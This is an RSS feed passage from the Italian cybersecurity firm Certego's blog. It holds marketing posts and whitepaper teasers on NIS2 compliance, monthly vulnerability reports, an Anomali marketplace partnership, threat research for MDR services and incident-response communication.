&lt;p&gt;Con la pubblicazione della Determina n. 164179, l’Italia entra nella seconda fase di attuazione della NIS2: quella dell’implementazione concreta. Le scadenze sono ravvicinate e gli obblighi dettagliati, rendendo &lt;strong&gt;indispensabile una governance strutturata e servizi di cybersecurity gestiti, come i servizi MDR erogati da Certego, per garantire una risposta efficace agli incidenti e il rispetto delle tempistiche imposte dalla normativa&lt;/strong&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Marzo 2025]]></description><link>https://www.certego.net/blog/whitepaper-marzo-2025-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-marzo-2025-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Mon, 14 Apr 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di marzo 2025, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego porta la Threat Intelligence italiana nel Marketplace di Anomali]]></title><description><![CDATA[Il contrasto alla criminalità organizzata si rafforza. Un passo avanti per la sicurezza informatica.]]></description><link>https://www.certego.net/blog/certego-porta-la-threat-intelligence-italiana-nel-marketplace-di-anomali/</link><guid isPermaLink="false">certego-porta-la-threat-intelligence-italiana-nel-marketplace-di-anomali</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Tue, 08 Apr 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Comunicato stampa.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Modena, 9 aprile 2025 - Certego, azienda modenese leader nel settore della cybersecurity e specializzata in servizi MDR e Threat Intelligence, &lt;strong&gt;annuncia il proprio ingresso nel Marketplace di &lt;a href=&quot;https://www.anomali.com/&quot;&gt;Anomali&lt;/a&gt;&lt;/strong&gt;, una delle principali piattaforme globali per la raccolta, l’analisi e la condivisione delle minacce informatiche.&lt;/p&gt;
&lt;p&gt;Le aziende potranno così accedere ai feed di Threat Intelligence di Certego direttamente dalla piattaforma Anomali, integrandoli nei loro sistemi SOC, SIEM e altre soluzioni di sicurezza per ottenere informazioni specifiche e tempestive sulle minacce più rilevanti.&lt;/p&gt;
&lt;p&gt;“&lt;em&gt;Essere presenti nel Marketplace di Anomali&lt;/em&gt; – dichiara &lt;strong&gt;Bernardino Grignaffini Gregorio, CEO e Founder di Certego&lt;/strong&gt; - &lt;em&gt;significa fare parte di un ecosistema consolidato di Threat Intelligence, rendendo i feed di Certego accessibili a un’ampia rete di aziende, team di sicurezza e istituzioni che operano in contesti critici. Questo rafforza l’impegno di Certego nella protezione del tessuto economico e industriale, fornendo dati concreti per anticipare e contrastare le minacce più pericolose”.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Anomali è una piattaforma globale leader, potenziata dall’IA, per la sicurezza e le operazioni IT, che consente alle aziende di rilevare, indagare e rispondere proattivamente alle minacce informatiche&lt;/strong&gt;. Aggregando e correlando dati da più fonti, Anomali aiuta le organizzazioni a individuare attività sospette e migliorare le strategie difensive contro gli attacchi. Tramite il suo Marketplace, gli utenti possono accedere a feed di intelligence di alta qualità da fornitori di primo piano a livello mondiale, tra cui Certego.&lt;/p&gt;
&lt;h2&gt;Un’offerta di Threat Intelligence su misura per il mercato italiano ed Europeo&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;La presenza di Certego nel Marketplace di Anomali non è solo un riconoscimento della qualità e dell’affidabilità dei suoi dati, ma rappresenta anche un’opportunità strategica per le organizzazioni che necessitano di una Threat Intelligence mirata e contestualizzata&lt;/strong&gt;. Certego fornisce &lt;strong&gt;indicatori di compromissione (IOC) e informazioni di intelligence specificamente focalizzate sulle esigenze delle aziende e istituzioni operanti in Italia e in Europa&lt;/strong&gt;, aiutandole a contrastare le minacce più rilevanti per queste aree.&lt;/p&gt;
&lt;p&gt;Le minacce informatiche diventano sempre più sofisticate e si evolvono nei diversi settori. Certego si distingue offrendo intelligence costantemente aggiornata e analizzata, permettendo a imprese e istituzioni di rafforzare le difese e migliorare la risposta agli incidenti.&lt;/p&gt;
&lt;p&gt;“&lt;em&gt;La nostra integrazione nel Marketplace di Anomali rappresenta un traguardo importante per Certego e per la cybersecurity&lt;/em&gt; – conclude Grignaffini – &lt;em&gt;grazie a questa collaborazione, mettiamo a disposizione di un pubblico ancora più ampio la nostra expertise e i nostri feed di Threat Intelligence, con un focus specifico sulle minacce più rilevanti.”&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;“&lt;em&gt;L’integrazione di Certego nell’Anomali Marketplace rafforza il nostro ecosistema, offrendo alle organizzazioni un’intelligence altamente mirata, pensata per i mercati italiano ed europeo,”&lt;/em&gt; afferma &lt;strong&gt;Alex Depret Bixio, Senior Vice President, Anomali International market&lt;/strong&gt;. “&lt;em&gt;Questa partnership garantisce ai team di sicurezza insight puntuali, per poter agire con prontezza e sicurezza.”&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;La sicurezza informatica è una sfida globale, ma richiede soluzioni su misura per ogni contesto&lt;/strong&gt;. Con questa iniziativa, Certego conferma il suo ruolo di riferimento per la cybersecurity e rafforza il suo impegno nella lotta contro le minacce informatiche, fornendo alle aziende strumenti concreti per proteggere le proprie infrastrutture digitali.&lt;/p&gt;
&lt;h4&gt;Certego&lt;/h4&gt;
&lt;p&gt;Certego è un’azienda italiana con 12 anni di esperienza specializzata in Threat Intelligence e Managed Detection &amp;#x26; Response (MDR), fornisce servizi avanzati di cyber security con l’obiettivo di proteggere aziende e istituzioni dalle minacce informatiche. Grazie alla piattaforma proprietaria PanOptiKon®, un team dedicato di esperti SecOps e Incident Response attivo 24/7 e un focus particolare sulla Threat Intelligence, Certego aiuta le organizzazioni a prevenire, rilevare e rispondere agli attacchi informatici in modo efficace e tempestivo.&lt;/p&gt;
&lt;h4&gt;Anomali&lt;/h4&gt;
&lt;p&gt;Anomali offre la principale piattaforma per la sicurezza e le operazioni IT potenziata dall’intelligenza artificiale. Anomali integra in un’unica potente piattaforma ETL, SIEM, Next-Gen SIEM, XDR, UEBA, SOAR e TIP. Al centro vi è Anomali Copilot, che opera su un Data Lake proprietario, cloud-native, per garantire velocità, scalabilità e prestazioni senza pari a costi ridotti. Modernizza la sicurezza e le operazioni IT per proteggere e far crescere la tua organizzazione con analisi migliori, maggiore visibilità, produttività e fidelizzazione del talento.
&lt;a href=&quot;https://www.anomali.com/&quot;&gt;Anomali&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Threat Research]]></title><description><![CDATA[La chiave per un servizio MDR proattivo]]></description><link>https://www.certego.net/blog/threat-research-la-chiave-per-un-servizio-mdr-proattivo/</link><guid isPermaLink="false">threat-research-la-chiave-per-un-servizio-mdr-proattivo</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Thu, 03 Apr 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Un servizio MDR efficace non si misura solo nella risposta, ma nella capacità di anticipare il rischio.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Al centro di questa proattività c’è la Threat Research, ovvero lo studio approfondito di tattiche, tecniche e procedure (TTPs) impiegate dai cybercriminali. Questo approccio trasforma i dati di cybersecurity in intelligence operativa, garantendo un servizio MDR che non solo protegge, ma evolve per anticipare le minacce di ultima generazione.
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;1. Identifica le minacce e le tecniche di attacco emergenti&lt;/h2&gt;
&lt;p&gt;I cybercriminali affinano costantemente le proprie tecniche per eludere le difese esistenti. La Threat Research svolge un ruolo cruciale nell&apos;identificare tempestivamente queste tattiche in evoluzione, consentendo ai difensori di adattare proattivamente la propria postura di sicurezza. Attraverso l’analisi continua di &lt;strong&gt;tattiche, tecniche e procedure (TTPs)&lt;/strong&gt; — mappate su framework riconosciuti come &lt;strong&gt;MITRE ATT&amp;#x26;CK&lt;/strong&gt; e validate dall’osservazione di attacchi reali — la Threat Research consente di individuare indicatori di compromissione emergenti e di anticipare le mosse degli aggressori, aggiornando le regole di rilevamento dei sistemi di difesa prima che si trasformino in incidenti.
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;2. Fornisce un contesto analitico per una risposta più rapida ed efficace&lt;/h2&gt;
&lt;p&gt;Quando un attacco viene rilevato, &lt;strong&gt;comprendere rapidamente “chi”, “come” e “perché” è fondamentale&lt;/strong&gt; per rispondere in maniera tempestiva. L’analisi approfondita dei TTPs consente ai team di incident response di disporre di &lt;strong&gt;playbook strutturati e workflow automatizzati&lt;/strong&gt;, accelerando le fasi di contenimento e risposta. Questa prontezza operativa può ridurre i tempi di reazione fino al 50%, migliorando la qualità dell’intervento e limitando l’impatto sulle attività aziendali.
&lt;br&gt;
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/whitepaper-state-of-cybersecurity-2024-recap/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACkklEQVR42lVS30tTYRje39Bl3QTRlZQR5FVSBBKFBFY3ERFLwiTQMKJIW1rRZRdBFlk3ZkuQlvN3RrHjTE2bmzvb2dwvd3bO2c6v7eg2g050nt4zI+ji+Z7vg5f3fZ/nexyyopqKqpmaXjT1YsnUiTWdWCuaxaJBKJka3RWqs2vzBdnkc4Ip5Qu191/8LMjKb2LDQQeyfA5rYRbfQyGsxThE4jFE4+sIhsMIRVisZ9KQCjJUVUOxZIAW+AdqZMOihex31ZETRMwvLOB2Xy8u3ryOU51OHGtrQeO1ZjRddeLSw3acf9AKz9w0towyGP88fAyDxaUlrCeS2Nwq1xrSxqDlqo68LIPjODCMD6lkEitrq/B8nEC/tx9N7U6cowF1LY0Ymn6P8mYFb9zv8PzlAAbfujE6Ng4vIbAatFRNhyhJVYdMDdlYHLM+P1ZCLKJ010gKYMH19BnqTx/FoQsNcE95UN7axnSAw8RyhDiG+UgC8XgcyVTasqWTt9sOISeA1w3ov4CEXoFaKWPm8xRGxrxodd3DgTOHsfdEHYa8I6iUqwiwHBaCESyzMbCpDcSTabuRJSvKjuRMlsdy4Bs+MbPoe/II7vFhNF0+id0NR7Cv+TgOnq3Hrv178HpwEOXtH+j0S3DOKWjzK7his08EL0pWgT4tLys7n+KbY3Dnfg9evBqA2zOMDlcXOrq7caP7Lrpct9DzuBcrwVXoRQNfEnmMR0VMRQVMchKYrA7yzyoZm+RhvuqwtZMH4Ck66XQGiUQKYk4kCDXkeIE81UGZrEXE0DWUVBkljSSKAgLBkO27FYlyyGxkq7UcqnaGtNok/M3TfzkTRKkGUcwjR0zSavU8qfNMzuDr4pL1YdSLMBup/gFCg5kTwlFIhgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/7b99781a27e11cea921c1f8339901e5d/71c1d/2024%20Recap%20-%20COVER%20Certego%20Aused.png&quot; srcset=&quot;/website/static/7b99781a27e11cea921c1f8339901e5d/804b2/2024%20Recap%20-%20COVER%20Certego%20Aused.png 384w,
/website/static/7b99781a27e11cea921c1f8339901e5d/e5715/2024%20Recap%20-%20COVER%20Certego%20Aused.png 768w,
/website/static/7b99781a27e11cea921c1f8339901e5d/71c1d/2024%20Recap%20-%20COVER%20Certego%20Aused.png 1536w,
/website/static/7b99781a27e11cea921c1f8339901e5d/a878e/2024%20Recap%20-%20COVER%20Certego%20Aused.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;3. Consente di creare regole di rilevamento sempre aggiornate e potenziate&lt;/h2&gt;
&lt;p&gt;La Threat Research consente di generare regole di rilevamento dinamiche, &lt;strong&gt;sempre aggiornate e basate su comportamenti reali osservati sul campo&lt;/strong&gt;. Quando, attraverso lo studio, vengono individuati degli indicatori di compromissione, le regole di detection vengono aggiornate per rilevare questi tipi di attacchi nelle differenti fasi della &lt;strong&gt;kill chain&lt;/strong&gt;. Invece di affidarsi a configurazioni statiche, i motori di detection vengono alimentati con indicatori di compromissione contestualizzati e tempestivi. Il risultato è un sistema più preciso, in grado di produrre alert ad alta fedeltà, ridurre drasticamente i falsi positivi e reagire in modo mirato alle tecniche emergenti utilizzate dagli attaccanti.
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;4. Guida le strategie di sicurezza a lungo termine&lt;/h2&gt;
&lt;p&gt;Analizzando trend settoriali, gap infrastrutturali e profili degli avversari, la Threat Research fornisce &lt;strong&gt;insight strategici&lt;/strong&gt; per pianificare roadmap di cybersecurity allineate agli obiettivi di business. Questa visione data driven supporta decisioni di investimento mirate in &lt;strong&gt;vulnerability management&lt;/strong&gt;, formazione e rafforzamento della postura difensiva.
&lt;br&gt;&lt;/p&gt;
&lt;p&gt;In un contesto in cui le minacce evolvono più rapidamente delle tecnologie stesse, la Threat Research si afferma come un pilastro fondamentale per una difesa informatica realmente proattiva. &lt;strong&gt;Affidarsi a un servizio di Managed Detection &amp;#x26; Response basato su un’intensa attività di Threat Research significa dotarsi di una capacità predittiva e adattiva, trasformando ogni dato raccolto in un’opportunità di protezione e miglioramento continuo.&lt;/strong&gt;
&lt;br&gt;
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1117px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 138.80208333333331%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAcCAIAAADuuAg3AAAACXBIWXMAAC4jAAAuIwF4pT92AAAELklEQVR42l1V3VLqVhTmQfoGnT5FL/oSvT3P0SsvvLJTnfHGdjjTmbaigsqf/AjCQUAQRBGBhAQSEgIhJPwEiBCgX7I5ejx7NpuVtff6+b69suJYr9csy4qiuFgslsvlzB6bzQb6jT0WxnygqpysTUfaamUS5dI0JVlxQPL5fE6n8/Dw8OjoaHd3t1AoQLlarYi9ICu/uks/fn78LVzerJbEpblazeeGZRwKhfL5fKVSgVmxWGy32wzD8DxPgsRo6Sdn6Yf91C8nFX2bFNnZOJAqwu7s7Ozv7+/t7R0cHPxhj+PjY3JC7PU/ecs/n7O/x8ub5YIYA6JlvLYHXJimiRXIScIr07RYME19PFIVRej1J0PNMAzYjCdTWVEtY9gIgkDTNEXVkS1FUaIgIPM3Ta1Wg5LnWrVavVqtappGGLGMLfTmajY3MKez+XQ6IwL+IIAVw3idzWyNfcZSGq/mmzE2WE5o8mKr3eHFLpmc0OWIIHZbgoRde3Zwhmm1R+PJ1lifzrAhSnKjyUeub8LXN9FYIn13n7zNxJOpm+Rt8fH5q0eJEzoMJ3wwhr+eotVo1hcIXfqD55e+wFU4FI25Tj3ewFU8kbqKXAfxnEghDPudMbvNSkRKiI+VTMgNlmNbbYppvdQbeESYD8bD0fjxuVp+qT9X65Ua/VKnKzXquUphhQE0kKsUU6UaRP9QrsjK4JvInEBcIgIm0+SRC+LUG00akTkBxhCQi522+D1mua9STBMIPRc+z6XXfxX2B0NnngsLtj94cub5z3WKNZ3Ng7bhaPJ+VbgYMAbH2XwxXywlUulkKpO5u88XH8HWbSaXL5S+pLOp9F3h4anVlkYTfWuMHGzAQEgTbDWaAfNErjfYKs0APCBgQv9UqfUH6tZ4ouvQAirNtpjWlmogtGnnG01gtjQ4AEt7ZVRt+J52s90RJBnE3OWL2Xwhk7u/Lz0h1VzhoVAqp7O5TK4A2iV5gCIBZ6Ox/k4YB8IUFfFP3OeuU/ep+xyl4rnwus48KJu/nH+DLXAJp6gzZDEcfyBMItVHciPwIAMzVoBEWFCALZQiruadMPCObbsqyAnGpoqxabMEcEYEUjOoqL7ylTBdn9Isb1Vik7eKpNEESTZ/HKGXJFK39LxVSCynDcffYBakXn+A0/5g+MIbCEfjwVDEDSkUSd5mY4kvuO3odYKkbVeYTnqYSSpM6inwjdcQZpFYIhpPwgUyJC8wApLaJFU8UIeb9cbRH2hoDi3rRbU4QwZttDwFbUvFS9rtq2JXFrv9tyZhHehYE1G3DRCdDG0PP/RA9L6OoorDiToYyHJfn07Hk4lpD7Quu0nNyEfBMdBGeAYAdCvIpNH/+a9r7/M/4WDA7/ejDUej0bdvCMkUt6uNJg5Ah0tooQJ40qvRdc3FK5HRQMkHiAziAifnxuv/DCHDUr7socQAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/1d27fb4c75b17aeb204884ca0121d657/76a99/Threat%20Research%20Certego%20MDR.png&quot; srcset=&quot;/website/static/1d27fb4c75b17aeb204884ca0121d657/804b2/Threat%20Research%20Certego%20MDR.png 384w,
/website/static/1d27fb4c75b17aeb204884ca0121d657/e5715/Threat%20Research%20Certego%20MDR.png 768w,
/website/static/1d27fb4c75b17aeb204884ca0121d657/76a99/Threat%20Research%20Certego%20MDR.png 1117w&quot; sizes=&quot;(max-width: 1117px) 100vw, 1117px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[State of cybersecurity - 2024 RECAP]]></title><description><![CDATA[Il report realizzato da Certego per AUSED che analizza i trend di sicurezza delle aziende italiane nel 2024]]></description><link>https://www.certego.net/blog/whitepaper-state-of-cybersecurity-2024-recap/</link><guid isPermaLink="false">whitepaper-state-of-cybersecurity-2024-recap</guid><category><![CDATA[Whitepaper]]></category><pubDate>Sun, 23 Mar 2025 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;State of Cybersecurity è la ricerca realizzata da Certego per AUSED – l’Associazione tra Utenti di Sistemi e Tecnologie dell’Informazione che raccoglie oltre duecento aziende italiane – ed è stata recentemente ripresa anche da Il Corriere della Sera, a conferma della sua rilevanza nazionale.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1464px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/911220105e2b4588f3c64dd0a812ac51/6f464/Aused%20Certego%20articolo%20Corriere.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 57.03125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAABYlAAAWJQFJUiTwAAACYUlEQVR42iXO20/aYBgG8P6vS5ZsS7bsbhebmWaZxhimU6Fypi2l9ExP0AK1QAs4SrGCaIR6YnO4XajRqZtY9i1Lfvm+vBfP+z7Q6aFX6vR4d4BaTtJ0kGaP2xl6l/dvjcN3Wn/G8Gb0wfvmeLZzNetcAnMd4Oo/aDKZ+L5/eXExPvv243x8e3Pt+5PHyZ/p9HHqT6b+A+A/3E2BCXhvp79/Te9vgMe7a2i/16sZums3Bt2Wt9cZ9r4Mu81+x+w7tW7LaBhytcgVFaakkPUiqXGpPIMoFJLLJHg8Ae3YLfCpLKoLaUsldQGxCpkCFalKWEXCJALmsXUWDfHpMIXAyWBgdfFDKLCwPD+3sbwI7bvOXtsa7dlnB/Z42D732ic968itnu7WPbcy3DaG2xXPtXZbhmOWTE1U6DSDRhk0lsukoEZZZZLwpkAYAl6Ts4Bbk808ZRWoTQGvSKQhUY2SJNM4gyWIOIxHQ8ngMo1EyiINOVVNysQKZFyl4oaI6xxq5gmdR8GurRJvqVytwNfLskzhLJbAwutAfC2AbazmGRxqaqyIwUomohARkAdbqnJGBmM2kacxiUQlEiuLjET9u0ymIuloMLH+CQuvgf6QKRF07DOPBHkkpFIJENsU0nI2ppAplSNATONJXWZzWZSIh5GNVXA2uDSPwCsiiUAWG2NCC/nkClBMB4t4aEvCSqBFJlokk7pIFThClxgAtMjhcXjp48LMm0hgXkCj0DPKeoIbT7O153T9BQM0Xovtl4L9SnCesnZlZ398PBgdez+/j86/noxHR8cHfdPQK1q+a2/9BUVR3h6ic160AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/911220105e2b4588f3c64dd0a812ac51/6f464/Aused%20Certego%20articolo%20Corriere.png&quot; srcset=&quot;/website/static/911220105e2b4588f3c64dd0a812ac51/804b2/Aused%20Certego%20articolo%20Corriere.png 384w,
/website/static/911220105e2b4588f3c64dd0a812ac51/e5715/Aused%20Certego%20articolo%20Corriere.png 768w,
/website/static/911220105e2b4588f3c64dd0a812ac51/6f464/Aused%20Certego%20articolo%20Corriere.png 1464w&quot; sizes=&quot;(max-width: 1464px) 100vw, 1464px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;p&gt;L’obiettivo della ricerca, basata su un campione di 1.200.000 asset monitorati all’interno della piattaforma PanOptikon®, è confrontare i volumi di attacco del 2024, con quelli del 2023, per indagare lo stato di sicurezza delle aziende italiane e le metodologie di attacco dei cyberciminali.&lt;/p&gt;
&lt;p&gt;Gli incidenti sono diventati più pericolosi? Quali sono le superfici di attacco più a rischio? Quali sono i settori maggiormente esposti? Qual è il rapporto tra falsi positivi e incidenti reali?&lt;/p&gt;
&lt;p&gt;Sono alcune delle domande a cui rispondiamo all’interno del report.&lt;/p&gt;
&lt;p&gt;Compila il form per ricevere il pdf.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Threat Intelligence - Vulnerability insights]]></title><description><![CDATA[Febbraio 2025]]></description><link>https://www.certego.net/blog/whitepaper-febbraio-2025-threat-intelligence-insights/</link><guid isPermaLink="false">whitepaper-febbraio-2025-threat-intelligence-insights</guid><category><![CDATA[Whitepaper]]></category><pubDate>Thu, 06 Mar 2025 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Una delle principali sfide per i team di sicurezza informatica è l&apos;implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.&lt;/p&gt;
&lt;p&gt;Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di febbraio 2025, identificate dal nostro team di Threat Intelligence.&lt;/p&gt;
&lt;p&gt;La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.&lt;/p&gt;
&lt;p&gt;I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.&lt;/p&gt;
&lt;p&gt;Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Notifica e gestione Incident Response]]></title><description><![CDATA[Comunica e collabora in un’unica piattaforma]]></description><link>https://www.certego.net/blog/notifica-e-gestione-incident-response-collabora-e-comunica-con-una-unica-piattaforma/</link><guid isPermaLink="false">notifica-e-gestione-incident-response-collabora-e-comunica-con-una-unica-piattaforma</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Thu, 27 Feb 2025 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Il panorama della cybersecurity richiede una gestione sempre più efficace e rapida delle attività di monitoraggio e risposta agli incidenti.
&lt;a href=&quot;https://www.certego.net/blog/unified-security-operations-platform-la-chiave-per-una-sicurezza-centralizzata-e-proattiva/&quot;&gt;Una piattaforma unificata per la gestione delle attività di Detection e Response &lt;/a&gt; si distingue per la capacità di &lt;strong&gt;centralizzare tutti gli aspetti operativi&lt;/strong&gt;. Uno dei benefici più significativi dal punto di vista dell’operatività è la gestione semplificata e ottimizzata delle comunicazioni tra il team di Security Operations del fornitore MDR (Managed Detection and Response) e il cliente.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;Perché una piattaforma unificata fa la differenza&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Le organizzazioni che si affidano ai fornitori MDR per la sicurezza possono affrontare difficoltà nella comunicazione e nel coordinamento. L&apos;uso di strumenti diversi, a volte non integrati, può causare inefficienze, ritardi e fraintendimenti, compromettendo la rapidità e l&apos;efficacia nella gestione degli incidenti. &lt;strong&gt;Una piattaforma unificata elimina queste criticità, offrendo un ambiente centralizzato dove informazioni, alert e attività sono facilmente accessibili sia al cliente che al fornitore&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Di seguito, analizziamo i principali benefici di una piattaforma unificata per la gestione delle comunicazioni tra il provider MDR e il cliente:&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;1. Maggiore velocità di risposta agli incidenti&lt;/strong&gt;&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Notifiche in tempo reale:&lt;/h3&gt;
&lt;p&gt;SecOps e cliente interagiscono direttamente su un’unica interfaccia, condividendo informazioni e dati fondamentali senza passare da sistemi separati come email o altre piattaforme esterne. Il cliente riceve aggiornamenti immediati su minacce e azioni intraprese, consentendo un’azione tempestiva.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Incident Response più agile:&lt;/h3&gt;
&lt;p&gt;La possibilità di comunicare, analizzare e attivare le procedure di Incident Response restando in un unico ambiente riduce i tempi di reazione e semplifica la collaborazione, evitando rallentamenti dovuti a scambi di informazioni frammentati.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;2. Significativa riduzione degli errori e delle incomprensioni&lt;/strong&gt;&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;h3&gt;Chiarezza delle procedure:&lt;/h3&gt;
&lt;p&gt;Grazie a una piattaforma unificata le attività sono definite con precisione e costantemente tracciate. In questo modo, SecOps e cliente mantengono un allineamento continuo sulle azioni da intraprendere nella gestione dell’incidente.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;h3&gt;Comunicazione standardizzata:&lt;/h3&gt;
&lt;p&gt;L’utilizzo di procedure di comunicazione predefinite riduce i margini di errore e assicura che le informazioni siano comprese correttamente da entrambe le parti.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/mdr-come-scegliere-il-servizio-migliore-per-la-tua-azienda/&quot;&gt;
